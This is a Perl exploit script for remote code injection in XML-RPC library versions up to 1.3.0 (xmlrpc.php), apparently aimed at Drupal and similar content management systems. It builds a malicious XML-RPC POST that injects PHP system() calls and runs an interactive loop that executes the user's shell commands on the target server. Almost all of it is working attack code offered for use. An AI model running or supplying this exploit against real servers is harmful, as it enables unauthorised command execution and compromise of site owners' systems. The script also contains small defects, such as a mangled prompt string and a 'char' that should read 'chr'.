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XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit
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# tested and working /str0ke
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print
# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;
# general
my $host;
#informational lines to feed my own ego.
print "xmlrpc exploit - http://www.reversing.org \n";
print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
print "special chars allowed are / and - \n\n";
# read command line options
my $options = GetOptions (
#general options
'host=s' => \$host, # input host to test.
# connection options
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'timeout=i' => \$conn_timeout);
# command line sanity check
&show_usage unless ($host);
# main loop
while (1){
print "\[email protected]# ";
my $cmd = <STDIN>;
xmlrpc_xploit ($cmd);
}
exit (1);
#exploit
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;
my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";
$data =~ s/-/'.chr(45).'/mg;
$data =~ s/\//'.char(47).'/mg;
my $req = new HTTP::Request 'POST' => $host;
$req->content_type('application/xml');
$req->content($d1.'system(\''.$data.'\')'.$d2);
my $ua = new LWP::UserAgent;
$ua->agent("xmlrpc exploit R/0.1");
$ua->timeout($conn_timeout);
if ($basic_auth_user){
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
}
if ($proxy){
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
}
#send request, return null if not OK
my $res = $ua->request($req);
if ($res->is_success){
$reply= $res->content;
} else {
$reply = "";
}
$reply =~ /(.*).(<pre>warning.*)/mgsi;
print ($1);
}
# show options
sub show_usage {
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
print "main options\n";
print "connection options\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--basic_auth_user, --basic_auth_pass\n";
print "\t--timeout \n";
print "\nExample\n";
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
print "\n";
exit(1);
}
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